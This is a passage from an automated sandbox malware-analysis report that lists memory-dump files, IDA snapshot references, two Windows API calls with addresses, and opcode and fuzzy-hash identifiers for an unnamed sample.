                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1721193555-0
                                                                                                                                                                                                                                                              • Opcode ID: 633894a9b8671180ead22ff167e03c76d176ab33f56e558341a726b13e60a171
                                                                                                                                                                                                                                                              • Instruction ID: fbdf990b2219704bc5a28742e6a4c8ecebc9caf3873eef4c92346ad575d4528f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 633894a9b8671180ead22ff167e03c76d176ab33f56e558341a726b13e60a171
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3E1F871E0065497DB24FB28CC4BB9E7AA1EB81720F9402DDE4156B3C2EF355E819BC2
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BFA813,00000001,00000364,00000006,000000FF,?,00BFEE3F,?,00000004,00000000,?,?), ref: 00BFD871
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: 89377904866a95cf6e3df2668849006907570c5a45d6d1832f768743f026f818
                                                                                                                                                                                                                                                              • Instruction ID: 6a0f1d136106b0ddfcd234ff5110329f964c73228d9b32a08ce5b950ff5f0543
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89377904866a95cf6e3df2668849006907570c5a45d6d1832f768743f026f818
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05F0E93161112CA6EB217A729C01B7F37DBDF453F0B1480E1AF0497181DB20DC0885E0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00BCDA1D,?,?,?,?), ref: 00BC87B9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              • Opcode ID: 1ded99d9f12298fe933b6012088cc84d847e4da20e4982a00e0ead8dfc1f2617
                                                                                                                                                                                                                                                              • Instruction ID: 97717c177b5121db4cb8b2a9abd12183973d09b9c9560ec2709611dd8a19c77c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ded99d9f12298fe933b6012088cc84d847e4da20e4982a00e0ead8dfc1f2617
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFC08C281116002AED2C06380185EA83385C9877B83F41BCDE0B04B1F1EE356C07D250
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00BCDA1D,?,?,?,?), ref: 00BC87B9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
